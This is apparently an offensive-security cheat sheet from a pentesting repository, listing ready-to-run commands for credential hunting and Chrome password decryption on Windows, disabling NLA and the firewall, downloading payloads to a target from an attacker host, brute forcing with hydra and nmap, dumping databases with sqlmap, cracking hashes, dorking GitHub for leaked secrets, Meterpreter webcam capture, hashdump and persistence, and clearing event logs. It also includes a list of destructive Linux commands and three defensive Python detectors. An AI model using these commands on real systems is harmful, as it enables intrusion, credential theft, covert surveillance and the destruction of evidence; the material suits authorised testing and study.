Kode-n-Rolla/pentesting_time

Welcome to my offensive security cheat sheet library.

Please use responsibly and ethically, especially when exploring sensitive security concepts.

There are:

  1. Network tools
  2. Web Shells
  3. Scripts
  4. Commands
  5. Payloads with descriptions (this file carries only the payloads themselves)
  6. Sites
  7. Tools
  8. Privilege Escalation
  9. Tips
  10. GPTs (Agents) for Cybersecurity
  11. OSINT
  12. API
  13. WordPress
  14. JWT
  15. Help with Pentesting and Bug Bounty processes
  16. Cloud
  17. Active Directory

    N.B. "<-- Back" links return to the table of contents.

Commands

Topic contains:
  • Remote Desktop Protocol (RDP)
  • PowerShell
  • Linux
  • Windows
  • Nmap commands with search vulnerabilities scripts
  • Gobuster
  • Hydra
  • Dirsearch
  • Pumping shell
  • SQLmap
  • John The Ripper
  • Hashcat
  • Google Dorks
  • GitHub Dorking
  • Ffuf
  • Rustscan
  • Masscan
  • Meterpreter
  • CMD (Windows)
  • Reverse shell
  • Git
  • SSH and id_rsa
  • Clear log files
          Remote Desktop Protocol (RDP)

     xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:<TARGET_IP> /u:<USERNAME> /p:'<PASSWORD>' 

     xfreerdp /v:<TARGET_IP> /u:<USERNAME> /p:<PASSWORD> +clipboard 

          PowerShell commands

    • To turn an unstable shell into a stable one from PowerShell, download the reverse-shell binary (FILENAME.exe) onto the target:
       powershell -c "Invoke-WebRequest -Uri 'http://<LOCAL_IP>:<PORT>/<FILENAME.exe>' -OutFile 'C:\Windows\Temp\<FILENAME.exe>'" 
    • With this command, you can identify files with potentially sensitive data such as account information, credentials, configuration files, etc. based on their filename:

      gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue
    • This command looks for remnants of automated setup and unattended installation files (sysprep, unattend), which may contain plaintext or base64-encoded passwords:

      gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinue
    • With this command it is possible to find files containing a specific pattern, for example here we are looking for the "password" pattern in various text configuration files:

      gci c:\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password"
    • Using the following PowerShell command, you can find database connection strings (with plain text credentials) stored in various configuration files such as web.config for ASP.NET configuration, Visual Studio project files, etc.:

      gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString"
    • With this command, you can easily find configuration files belonging to a Microsoft IIS, XAMPP, Apache, PHP, or MySQL installation:

      gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue
    • With the following one-liner, we can retrieve all stored credentials from the credential manager using the CredentialManager PowerShell module:

      Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine ":" ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); }
    • The following snippet decrypts a password saved by Google Chrome, if installed and if there are saved passwords. $datarow is a row read from Chrome's "Login Data" SQLite database; this DPAPI-only decryption applies to profiles written by Chrome versions before 80, which protected each password directly with DPAPI (later versions wrap an AES key in DPAPI instead):

      [System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser))
    • The following command will get the autologin credentials from the registry:

      gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select "Default*"
    • Sometimes it can be useful to set the MAC address on a network interface, and with PowerShell we can easily do this without using third party utilities:

      Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D"
    • This trio of commands is useful when the goal is a graphical RDP session but RDP is, for some reason, not enabled:

      Allow RDP connections -

      (Get-WmiObject -Class "Win32_TerminalServiceSetting" -Namespace root\cimv2\terminalservices).SetAllowTsConnections(1)

      Disable NLA -

      (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)

      Allow RDP on the firewall -

      Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Set-NetFirewallRule -Enabled True
    • Here is a useful command to whitelist an IP address in Windows Firewall:

      New-NetFirewallRule -Action Allow -DisplayName "name_rule" -RemoteAddress <DESIRED_IP>
      After we are done with our cases, remove the rule:
      Remove-NetFirewallRule -DisplayName "name_rule"
    • With the following commands, we can stop PSReadLine from saving command history in the current shell session (this affects only the PSReadLine history file, not PowerShell script block logging or transcription):

      Set-PSReadlineOption -HistorySaveStyle SaveNothing

      OR

      Remove-Module PSReadline
    • Here is a simple PowerShell command to query the Security Center and determine all installed antivirus products on this computer:

      Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct

          Linux

    ExplainShell - provides a convenient interface for searching help information for any command

        Commands to find

    • Find all files under / (use -type d instead to find directories):

       find / -type f 
    • File name search:

       find / -type f | grep '<FILE_NAME>' 
    • Find files whose name contains 'config', excluding everything under /proc:

       find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null 
    • To stop sending the hostname via DHCP, edit the NetworkManager connection profile:

       sudo nano /etc/NetworkManager/system-connections/Wired\ connection\ 1 

         [ipv4]

         method=auto

         dhcp-send-hostname=false

    • To enable IP forwarding on your machine (the basic prerequisite for MITM setups):

       sudo sysctl -w net.ipv4.ip_forward=1 
    • Transferring files:
       scp <FILE_NAME> <USERNAME>@<TARGET_HOST>:</path/to/dir/on/victim_machine>
       wget http://<ATTACKER_IP>:<ATTACKER_PORT>/<FILE_NAME> 
       curl http://<ATTACKER_IP>:<ATTACKER_PORT>/<FILE_NAME> -o <FILE_NAME> 

        Never run these Linux commands:

    • This command will delete all files and folders on your computer:
       rm -rf /  
    • Also known as a "fork bomb", this command can cause a memory overflow on your computer and lead to system crash:
       :(){ :|: & };: 
    • This command formats the hard drive without any warning or confirmation. All data will be lost:
       mkfs.ext4 /dev/sda 
    • This command overwrites all data on the hard drive with random values, resulting in data loss:
       dd if=/dev/random of=/dev/sda 
    • This command grants full access to your file system for all users, which can compromise security:
       chmod 777 / 
    • This command moves all files in your home directory to "null", effectively deleting them:
       mv /home/* /dev/null 
    • This command downloads a file and overwrites all data in "null", resulting in data loss:
       wget http://example.com/file -O /dev/null 
    • This command formats the hard drive partition without any warning or confirmation. All data on this partition will be lost:
       mkfs.ext4 /dev/sda1 
    • This command creates a symbolic link to "/etc/passwd" in "null", resulting in data loss:
       ln -s /dev/null /etc/passwd 
    • This will replace your partition containing all the necessary data for booting the system with the string "Hello":
       echo "Hello" > /dev/sda 
    • Such commands will download and execute malicious scripts on your system, potentially compromising your system's security:
       wget http://malicious_source -O- | sh 

          Windows

        Commands to find

    1. This command searches for the string "password" inside all files with the extensions .xml, .ini, .txt, and .config on the current C: drive:
      cd C:\ & findstr /s /p /i /n /m "password" *.xml *.ini *.txt *.config
      • cd C:\ - changes to the root directory of the C: drive
      • findstr - command for searching strings in files
      • /s - performs a search in all subdirectories
      • /p - skips files with non-printable characters
      • /i - ignores case sensitivity when searching for strings
      • /n - displays the line number containing the string
      • /m - displays only the file name if a match is found
    2. dir - the equivalent of ls on Linux
    3. tree utility is useful for graphically displaying the directory structure of a path or disk

      tree c:\ /f | more - used to walk through all the files in the C drive

    4. icacls

      Inheritance flags:

      • (CI): container inherit
      • (OI): object inherit
      • (IO): inherit only
      • (NP): do not propagate inherit
      • (I): permission inherited from parent container
      Basic access permissions:
      • F : full access
      • D :  delete access
      • N :  no access
      • M :  modify access
      • RX :  read and execute access
      • R :  read-only access
      • W :  write-only access
      A full listing of icacls command-line arguments and detailed permission settings can be found here.

          Nmap with vulners script (1)

    Download the script files from GitHub and copy them into the nmap scripts folder. Thanks for that, Vulners Team!

    Checking for a vulnerability in the software on the server:

     nmap -Pn <TARGET_IP> --script=vulners.nse -p<PORT(S)> 
    Checking brute force resistance on ssh:

     nmap --script ssh-brute -p <SSH_PORT> <TARGET_IP> --script-args userdb=users.lst,passdb=passwords.lst 
    Checking brute force resistance on ftp:

     nmap -d --script ftp-brute -p <FTP_PORT> <TARGET_IP> 
    Checking mysql anonymous login:

     nmap -sV --script=mysql-empty-password <TARGET_IP> 
    Attempts to select a pair of login/password to enter the mysql database:

     nmap --script mysql-brute -p <MYSQL_PORT> <TARGET_IP> --script-args userdb=users.lst,passdb=passwords.lst 
    Search for hidden folders and files:

     nmap -sV -p <PORT> --script http-enum <TARGET_IP> 

    P.S. If a CMS or database is present, look for a matching <name_of_CMS_or_DB>-brute nmap script.

    P.P.S. Full list of nmap NSE scripts.

      Categories: auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, vuln.

          Nmap with vulscan script (2)

    The script needs to be installed. Thanks for that, Scip ag!
    1.  git clone https://github.com/scipag/vulscan.git 

      Or follow the Scip ag instructions. It's easy.

    2. Copy it to /usr/share/nmap/scripts/ or another folder where you keep nmap scripts
    3. Set the right file permissions
    4.  nmap -sV --script=vulscan/vulscan.nse <TARGET> 

          Gobuster command:

       Directories enumeration:

    -u - target url

    -w - wordlist

    -s - include only responses with the specified status codes (comma-separated)

    -b - exclude responses with the specified status codes (comma-separated)

    --exclude-length - exclude responses with specific content lengths (comma-separated, supports ranges)

    gobuster dir -u <TARGET_URL> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
       Subdomains enumeration:

    vhost - enumerate virtual hosts

    gobuster vhost -w </path/to/wordlist> -u <url>
        OR

    -t - threads

    gobuster dns -d <TARGET_DOMAIN> -w /usr/share/wordlists/dns/subdomains_list.txt -t 50

          Hydra

        Brute force against a protocol of your choice:
     hydra -P <WORDLIST> -v <TARGET_IP> <PROTOCOL> 

        Brute force ssh:

    hydra -L /path/to/file/user.txt -P /path/to/file/pass.txt <TARGET_IP> ssh -t 4

        Brute force smb example:

     hydra -L ~/path/to_file/user.txt -P ~/path/to_file/pass.txt <TARGET_IP> smb -V

        Hydra can brute force usernames as well as passwords: it loops through every combination of the two lists (-v -V = verbose mode, showing each login attempt; -u = loop over users first, trying each password against all users):

     hydra -v -V -u -L <USERNAME_LIST> -P <PASSWORD_LIST> -t 1 <TARGET_IP> <PROTOCOL> 

        Attack a Windows Remote Desktop with a password list:

     hydra -t 1 -V -f -l <USERNAME> -P <WORDLIST> rdp://<TARGET_IP> 

        Craft a more specific request for Hydra to brute force (here a WordPress login form):

     hydra -l <USERNAME> -P <PASSWORD_LIST> <TARGET_IP> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location' 
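The ssh brute-force commands above (hydra with several parallel tasks) leave a very recognisable trace in sshd logs. The following Python script is an added example, not part of this repository: it parses constructed auth.log lines and flags any source IP that accumulates a threshold of failed logins inside a sliding time window. The threshold, the window, the log lines and the IP addresses are all constructed for the example.

```python
"""Added example (not from the cheat sheet): flag password-guessing bursts in sshd logs.

A hydra run with -t 4 opens several sessions in parallel, so it shows up in
/var/log/auth.log as many "Failed password" lines from one source within seconds.
Threshold and window below are tuning choices for the example, not values from the page.
"""
import re
from collections import defaultdict
from datetime import datetime

# syslog-style sshd failure line: "Mar  3 10:15:01 host sshd[2001]: Failed password for ..."
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

# Constructed sample: five rapid failures from 203.0.113.7 (a TEST-NET-3 address),
# one stray failure followed by a success from 198.51.100.2 (a normal typo).
SAMPLE_LOG = """\
Mar  3 10:15:01 host sshd[2001]: Failed password for invalid user admin from 203.0.113.7 port 50122 ssh2
Mar  3 10:15:01 host sshd[2002]: Failed password for invalid user admin from 203.0.113.7 port 50123 ssh2
Mar  3 10:15:02 host sshd[2003]: Failed password for root from 203.0.113.7 port 50124 ssh2
Mar  3 10:15:02 host sshd[2004]: Failed password for root from 203.0.113.7 port 50125 ssh2
Mar  3 10:15:03 host sshd[2005]: Failed password for root from 203.0.113.7 port 50126 ssh2
Mar  3 10:20:44 host sshd[2100]: Failed password for alice from 198.51.100.2 port 41000 ssh2
Mar  3 10:20:50 host sshd[2101]: Accepted password for alice from 198.51.100.2 port 41000 ssh2
"""


def parse_failures(log_text, year=2024):
    """Yield (timestamp, user, ip) for every failed-password line.

    syslog lines carry no year, so the caller supplies it (constructed here)."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: (total_failures, sorted_usernames)} for every source IP that
    produced at least `threshold` failures inside any `window_seconds` window."""
    stamps_by_ip = defaultdict(list)
    users_by_ip = defaultdict(set)
    for ts, user, ip in parse_failures(log_text):
        stamps_by_ip[ip].append(ts)
        users_by_ip[ip].add(user)

    hits = {}
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # slide the window start forward until it fits inside window_seconds
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = (len(stamps), sorted(users_by_ip[ip]))
                break
    return hits


if __name__ == "__main__":
    for ip, (count, users) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} failed logins, usernames tried: {', '.join(users)}")
```

The same parser works on a real auth.log; the window and threshold are the knobs to tune so that a user who mistypes a password twice is not reported alongside a dictionary run.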

          Dirsearch

    Search for interesting files by extension:
     dirsearch -e php,log,sql,txt,bak,tar,tar.gz,zip,rar,swp,gz,asp,aspx -u '<TARGET_IP>' 

          Upgrading a netcat shell to a full TTY

    • Python way. pty is a module for pseudo-terminal handling in the Python standard library. From the nc shell, spawn a PTY:
       python -c 'import pty;pty.spawn("/bin/bash")' 

      Then background the shell (Ctrl+Z) and, on the attacker side, run:

      stty raw -echo && fg

      If there is no python:

      /usr/bin/script -qc /bin/bash /dev/null
    • Another way:
      script /dev/null -c /bin/bash
      Send the console to the background (Ctrl+Z), then:
      stty raw -echo; fg
      Press Enter twice to get back into the shell, then set the terminal type:
      export TERM=xterm

          SQLmap

        Start SQL injection attack:
    sqlmap -u "<TARGET_URL>" --dbs --batch
    -u - target URL

    --dbs - get db name

    --batch - never prompt; use the default answer whenever user input would be required

        Once the DB name is known, get the table names

    sqlmap -u "<TARGET_URL>" -D <db_name> --tables --batch
    -D - db name

    --tables - enumerate tables

        To get the column names of the table of interest

    sqlmap -u "<TARGET_URL>" -D <db_name> -T <table_name> --columns --batch
    -T - selected table

    --columns - to output db columns

        Get data from table

    sqlmap -u "<TARGET_URL>" -D <db_name> -T <table_name> --dump --batch
    --dump - unload information from the DBMS database

        Will execute all the above functions at once and output all information about the database, including table names, columns, etc.

    sqlmap -u "<TARGET_URL>" -D <db_name> --dump-all --batch
    --dump-all - unload all information from the DBMS database

          John The Ripper

    First identify the hash type, for example with hash-identifier.

        Cracking some type of hashes:

    john --format=raw-<encryption> --wordlist=path/to/wordlist.txt to_crack.txt
    <encryption> - md4, md5, sha1, sha256, whirlpool

        Single Mode

    There is a username and a password hash (username:d776dd32d662b8efbdf853837269bd725203c579 on one line in to_crack.txt), so use this mode to generate password variations from the username (Username, USERNAME, UseRNAmE, and so on):

    john --single --format=raw-sha1 to_crack.txt

        Dictionary Mode

    There is a file to_crack.txt with edba955d0ea15fdef4f61726ef97e5af507430c0, for example.

    The command to run John in dictionary mode using the wordlist:

    john --wordlist=path/to/wordlist.txt --format=raw-sha1 to_crack.txt

        Incremental Mode

    It tries all possible character combinations as passwords. It can run for a very long time if the password is long or mixes alphanumeric characters and symbols:

    john -i:digits passwordfile.txt

    -i - tells John to use incremental mode

    digits - the incremental mode to use; the 'digits' mode tries numeric characters only

        To crack LM/NTLM:

    john --format=lm to_crack.txt

        To crack a Linux password

    The unshadow command combines the passwd (/etc/passwd) and shadow(/etc/shadow) files together into a single file. This can then be used by John to crack passwords.

    The command will combine the files together and create an output.db file:

    unshadow /etc/passwd /etc/shadow > output.db

    Now crack the output.db file:

    john output.db

        Cracking a Zip file password

    First get the hash of the zip file's password. The command extracts the hash from the zip file and stores it in the zip.hashes file:

    zip2john file.zip > zip.hashes

    Then to crack the hash:

    john zip.hashes

          Hashcat

        MD5 Hashes

    hash.txt > 8743b52063cd84097a65d1633f5c74f5

    Use:

    hashcat -m 0 -a 0 hash.txt passwordlist.txt

    -m 0 - MD5 hash mode

    -a 0 - dictionary mode

    hash.txt - txt file containing hash in a compliant format

    passwordlist.txt - dictionary file containing passwords in plain text

        Salted MD5 Hashes

    hash.txt > md5($pass.$salt): 01dfae6e5d4d90d9892622325959afbe:7050461

    hashcat -m 10 -a 0 hash.txt passwordlist.txt

    -m 10 - salted MD5 hash mode

        MD5Crypt Digests

    hash.txt > md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) $1$28772684$iEwNOgGugqO9.bIz5sk8k/

    hashcat -m 500 -a 0 hash.txt passwordlist.txt

    -m 500 - MD5Crypt Digests hash mode

        HMAC-SHA1 key

    hash.txt > HMAC-SHA1 (key = $pass) c898896f3f70f61bc3fb19bef222aa860e5ea717:1234

    hashcat -m 150 -a 0 hash.txt passwordlist.txt

    -m 150 - HMAC-SHA1 key hash mode

        SHA-1 Digests

    hash.txt > b89eaac7e61417341b710b727768294d0e6a277b

    hashcat -m 100 -a 0 hash.txt passwordlist.txt

    -m 100 - SHA1 digest hash mode

        SHA2-384 Hash

    hash.txt > SHA2-384 07371af1ca1fca7c6941d2399f3610f1e392c56c6d73fddffe38f18c430a2817028dae1ef09ac683b62148a2c8757f42

    hashcat -m 10800 -a 0 hash.txt passwordlist.txt

    -m 10800 - SHA-2 Digests hash mode

        SHA3-512 Hash

    hash.txt > SHA3-512 7c2dc1d743735d4e069f3bda85b1b7e9172033dfdd8cd599ca094ef8570f3930c3f2c0b7afc8d6152ce4eaad6057a2ff22e71934b3a3dd0fb55a7fc84a53144e

    hashcat -m 17600 -a 0 hash.txt passwordlist.txt

    -m 17600 - SHA3-512 hash mode

        NTLM Hashes

    hash.txt > b4b9b02e6f09a9bd760f388b67351e2b

    hashcat -m 1000 -a 0 hash.txt passwordlist.txt

    -m 1000 - NTLM Digests hash mode

        CRC32 hashes

    hash.txt > c762de4a:00000000

     hashcat -m 11500 -a 0 hash.txt passwordlist.txt

    -m 11500 - CRC32 hash mode
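To make the -m numbers above concrete, here is an added Python example (not part of this repository) that computes the digest hashcat compares against for several of the listed modes and checks one candidate password against a hash.txt line, the way you would confirm a recovered password or test a known-weak one during an audit. NTLM (-m 1000, MD4 over UTF-16LE), md5crypt and CRC32 are left out because their constructions are not available from hashlib on every build. The MD5 and SHA-1 hashes shown above are hashcat's published example hashes for the password "hashcat", which is what the check below confirms; the banned-password list passed to first_match is constructed.

```python
"""Added example (not from the cheat sheet): how several hashcat modes are computed,
and how to check one candidate against a hash.txt line in the matching format."""
import hashlib
import hmac


def digest_for_mode(mode, password, salt=""):
    """Return the lowercase hex digest hashcat would compare against for mode `-m mode`.

    `salt` is the part after the colon in a hash:salt line (empty for unsalted modes)."""
    p, s = password.encode("utf-8"), salt.encode("utf-8")
    if mode == 0:         # -m 0      MD5
        return hashlib.md5(p).hexdigest()
    if mode == 10:        # -m 10     md5($pass.$salt): salt appended to the password
        return hashlib.md5(p + s).hexdigest()
    if mode == 100:       # -m 100    SHA-1
        return hashlib.sha1(p).hexdigest()
    if mode == 150:       # -m 150    HMAC-SHA1 (key = $pass); the salt field is the message
        return hmac.new(p, s, hashlib.sha1).hexdigest()
    if mode == 10800:     # -m 10800  SHA2-384
        return hashlib.sha384(p).hexdigest()
    if mode == 17600:     # -m 17600  SHA3-512
        return hashlib.sha3_512(p).hexdigest()
    raise ValueError(f"mode {mode} is not covered by this example")


def matches(mode, hash_line, candidate):
    """True if `candidate` produces the digest stored in `hash_line` (hash or hash:salt)."""
    stored, _, salt = hash_line.strip().partition(":")
    # compare_digest avoids leaking match length through timing; harmless here, good habit
    return hmac.compare_digest(digest_for_mode(mode, candidate, salt), stored.lower())


def first_match(mode, hash_line, candidates):
    """Return the first candidate that matches, or None.

    This is the dictionary attack (-a 0) in miniature: useful for checking a stored hash
    against a short, constructed list of banned or previously leaked passwords."""
    for candidate in candidates:
        if matches(mode, hash_line, candidate):
            return candidate
    return None


if __name__ == "__main__":
    # hashcat's published example hash for -m 0 (password "hashcat")
    print(first_match(0, "8743b52063cd84097a65d1633f5c74f5", ["password", "hashcat", "letmein"]))
```

Note the format difference between the salted modes: for -m 10 the salt is appended to the password before hashing, while for -m 150 the password is the HMAC key and the salt field is the data being authenticated, so the two lines cannot be interchanged even though both look like hash:salt.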

          Google Dorks

    • site: - returns results for the specified domain
    • intitle: - search in the page title
    • inurl: - search in the URL
    • related: - returns sites related to the specified one
    • ext: or filetype: - search by page extension or file type
    • cache: - shows Google's cached copy of a page
    • intext: - search in the page body
    • allintext: - all terms must appear in the page body
    • allinurl: - all terms must appear in the URL
    • More here

          GitHub Dorking

    • AWS keys
      path:**/.env AWS_ACCESS_KEY_ID
    • Open DB passwords
      DB_PASSWORD=
    • DB dump files
      path:*.sql "CREATE TABLE" AND "INSERT INTO"
    • API keys
      path:**/.properties api_key
    • Root passwords in docker-compose
      path:**/docker-compose.yml MYSQL_ROOT_PASSWORD
    • Private keys
      path:*.pem private
    • Open secrets JWT
      language:javascript jwt_secret OR jwt_key
    • Open .git directories
      path:**/.git/*
    • Public ssh keys
      path:*.pub "ssh-rsa"
    • Passphrase
      passphrase * path:**/.json
    • Check commit and issues
    • Search for vulnerable code patterns (for example SQLi and SSRF):
      /SELECT \* FROM.*\$_GET/
      /file_get_contents\(.*\$_GET|curl_exec\(.*\$_GET/
      /(subprocess|exec|spawn|system).*chrome.*--headless/
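The dork patterns above are just as useful turned inward: running them over your own checkout before a push catches what GitHub code search would otherwise surface. The script below is an added example, not part of this repository; it approximates GitHub's path: qualifier with fnmatch globs, uses the regexes from the list above plus a private-key header pattern, and builds a small constructed sample tree in a temp directory to scan.

```python
"""Added example (not from the cheat sheet): a pre-push scan of a local checkout using
the dork-style patterns listed above. Globs approximate GitHub's `path:` qualifier."""
import fnmatch
import os
import re
import tempfile

# (rule name, path glob, content regex). Globs are matched against "/<relative path>".
RULES = [
    ("aws-key-in-env",     "*/.env",              re.compile(r"AWS_ACCESS_KEY_ID\s*=\s*\S+")),
    ("db-password",        "*",                   re.compile(r"DB_PASSWORD\s*=\s*\S+")),
    ("mysql-root-compose", "*docker-compose.yml", re.compile(r"MYSQL_ROOT_PASSWORD")),
    ("private-key-pem",    "*.pem",               re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("jwt-secret-js",      "*.js",                re.compile(r"jwt_secret|jwt_key", re.I)),
    ("sqli-get-concat",    "*.php",               re.compile(r"SELECT \* FROM.*\$_GET")),
    ("ssrf-get-to-fetch",  "*.php",               re.compile(r"(?:file_get_contents|curl_exec)\(.*\$_GET")),
]

# Constructed sample repository. The key material and credentials are placeholders.
SAMPLE_FILES = {
    ".env": "APP_ENV=prod\nAWS_ACCESS_KEY_ID=AKIAEXAMPLE000000000\nDB_PASSWORD=hunter2\n",
    "deploy/docker-compose.yml": "services:\n  db:\n    environment:\n      MYSQL_ROOT_PASSWORD: example\n",
    "keys/server.pem": "-----BEGIN PRIVATE KEY-----\nMIIE(constructed, not a real key)\n-----END PRIVATE KEY-----\n",
    "src/user.php": "<?php\n$r = mysqli_query($c, \"SELECT * FROM users WHERE id=\" . $_GET['id']);\n",
    "src/fetch.php": "<?php\necho file_get_contents($_GET['url']);\n",
    "README.md": "No secrets here.\n",
}


def build_sample_tree():
    """Write SAMPLE_FILES into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="dorkscan_")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def scan_tree(root):
    """Return sorted (relative_path, rule_name, line_number) for every rule hit under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    lines = fh.read().splitlines()
            except OSError:
                continue
            for rule, glob, rx in RULES:
                if not fnmatch.fnmatch("/" + rel, glob):
                    continue
                for number, line in enumerate(lines, 1):
                    if rx.search(line):
                        findings.append((rel, rule, number))
    return sorted(findings)


if __name__ == "__main__":
    for rel, rule, number in scan_tree(build_sample_tree()):
        print(f"{rel}:{number}: {rule}")
```

Point scan_tree at a real checkout (and exclude .git) to get the same report; the regexes are deliberately loose, so expect to triage false positives rather than tune them until they are silent.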

          FFUF

    Flags:

    -mc (match code) - include only responses that match the specified status codes (e.g., 200,204,301,400-499)

    -ms (match size) - include only responses that match a specific size or range of sizes

    -mw (match words) - include only responses with the specified number of words in the response body

    -ml (match lines) - include only responses with the specified number of lines in the response body

    -mt (match time) - include only responses that meet a specific time-to-first-byte (TTFB) condition. Useful for spotting responses that are unusually slow or fast, which can indicate interesting behaviour

    -fc (filter code) - exclude responses that match the specified status codes, using the same format as -mc

    -fs (filter size) - exclude responses with a specific size or range of sizes

    -fw (filter words) - exclude responses with the specified number of words in the response body

    -fl (filter lines) - exclude responses with a specific number of lines or range of lines. For example, -fl 5 filters out responses with 5 lines

    -e - file extensions to append to each word (comma-separated)

    -recursion - recursive fuzzing

    ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://<TARGET_IP>:<TARGET_PORT>/FUZZ -e .php,.html,.txt
    ffuf -w /path/to/wordlist1.txt:W1 -w /path/to/wordlist2.txt:W2 -u https://example.com/W1?param=W2 -mc 200 -ic
    ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://<TARGET_IP>:<TARGET_PORT>/FUZZ -recursion
    ffuf -u http://<TARGET_URL> -H "Host: FUZZ.<TARGET_DOMAIN>" -w /path/to/wordlist

          Rustscan

    • Download the .deb package
    • Install:
      sudo dpkg -i rustscan_2.0.1_amd64.deb
    • Use:
      • Simple ports scanning:
        rustscan -a www.<target_site.com>
      • Specific port scanning:
        rustscan -a www.<target_site.com> -p 443

        Or few ports:

        rustscan -a www.<target_site.com> -p 21,22,80,443
      • Ports detection in the range 1-1000:
        rustscan -a www.<target_site.com> --range 1-1000

          Masscan

    • Scanning a Single IP Address:
      masscan <target_ip>
    • Scanning an IP Range:
      masscan 192.168.0.0-192.168.0.255
    • Scanning Specific Ports:
      masscan -p80,443 192.168.0.1
    • Scanning All Ports:
      masscan -p0-65535 192.168.0.1
    • Setting Scan Rate:
      masscan -p80 192.168.0.1 --rate 10000

      --rate - sets the scan rate. Here scanning runs at 10,000 packets per second. Pick the speed for each case; IMHO 500-1000 is fine.

    • Saving Results to a File:
      masscan -p80 192.168.0.1 -oG results.txt

      -oG - saves the scan results to a file in grepable format.

    • Scanning Specific Packet Types:
      masscan -p80 192.168.0.1 --packet 1-5

      --packet - specifies the packet types to scan with.

    • Scanning via SOCKS5 Proxy:
      masscan -p80 192.168.0.1 --source-ip <proxy_ip> --source-port <proxy_port>

      These flags specify the source IP and port used when scanning through a SOCKS5 proxy.

          Meterpreter

    • arp - displays MAC and IP addresses of local devices interacted with
    • cd - command to change to another directory/folder
    • clearev - clears logs (need administration privs)
    • dir/ls - lists files and folders in the specified directory
    • download - downloads files from the remote machine to the local machine
    • getpid - displays the process ID under which Meterpreter is running
    • getproxy - retrieves information about the system's proxy server
    • getsystem - attempts to escalate privileges
    • getuid - displays the current user on behalf of whom Meterpreter is running
    • hashdump - dump all password hashes
    • help - help, display help documentation
    • idletime - displays user inactivity time on the remote computer
    • ifconfig/ipconfig - displays network settings
    • migrate - migrates meterpreter to another process
    • netstat - displays current network connections
    • ps - lists all current processes
    • pwd - displays the current directory/folder
    • record_mic - records audio on the remote machine
    • route - displays the routing table
    • run persistence <with_parameters> - installs a backdoor (persistence help)
    • search - search for files, modules
    • show_mount - lists physical and logical disks
    • sysinfo - displays brief information about the remote system
    • upload - uploads files from the local machine to the remote machine
    • webcam_chat - organize a video chat
    • webcam_snap - takes a snapshot from the remote built-in camera
    • webcam_stream - obtains a video stream from the remote built-in camera
    • run post/multi/recon/local_exploit_suggester - recon for privesc
    • load kiwi - to load mimikatz

          CMD

    1. Clearing log files
      • wevtutil cl Application
      • wevtutil cl System
      • wevtutil cl Security

        OR check firewall settings to find location of log file

      • netsh firewall show config (old command)
      • netsh advfirewall show currentprofile (MS recommends this command) -> cd to the log file directory, `more file.log` to read it -> disable the firewall
      • netsh firewall set opmode disable - disables the firewall (old command)
      • netsh advfirewall set currentprofile state off
      • del file.log
    2. Viewing System Information
      • systeminfo - displays system information and installed patches
      • net user - lists local users
      • whoami /all - provides information about the current user
      • driverquery - lists installed drivers
    3. Network Settings
      • ipconfig /all - shows network settings
      • ipconfig /displaydns - display cached DNS records
      • arp -a - lists IP addresses that the computer has communicated with
      • netstat - shows established connections
      • netstat -a - lists open ports
      • netstat -ao - displays open ports and associated IDs
      • netstat -abo - lists open ports, associated process IDs, and their names
      • netstat -r - shows the routing table
    4. Working with Services
      • tasklist - lists current processes
      • taskkill /f /pid "process_number" - terminates a process
      • schtasks - displays scheduled tasks
      • sc query - lists all services
